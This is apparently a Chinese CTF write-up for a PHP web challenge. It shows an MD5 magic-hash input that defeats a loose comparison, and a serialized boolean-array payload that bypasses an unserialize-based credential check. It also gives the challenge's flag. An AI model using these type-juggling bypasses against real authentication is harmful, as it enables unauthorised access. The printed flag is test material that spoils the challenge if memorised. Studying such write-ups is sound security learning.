天网管理系统

原题链接

http://ctf5.shiyanbar.com/10/web1/

分析

查看源码

<!-- $test=$_GET['username']; $test=md5($test); if($test=='0') -->

easy

username=QNKCDZO
页面结果
/user.php?fame=hjkleffifer

进入链接

$unserialize_str = $_POST['password'];
     $data_unserialize = unserialize($unserialize_str);
     if($data_unserialize['user'] == '???' && $data_unserialize['pass']=='???')
     {
       print_r($flag);
     }
伟大的科学家php方言道：成也布尔，败也布尔。
回去吧骚年

反序列化，php的提示是说bool。
'???'是一个字符串，注意到这里用的是==，也就是说很可能可以利用php弱类型。

<?php
var_dump(true=='olivia');
//bool(true)

所以这里payload 很简单。

<?php
$test = array("user"=>true,"pass"=>true);
$stest = serialize($test);
echo $stest."\n";
?>
//a:2:{s:4:"user";b:1;s:4:"pass";b:1;}

但是注意，要回到index.php提交password。

flag

ctf{dwduwkhduw5465}

知识点

php序列化与反序列化
php弱类型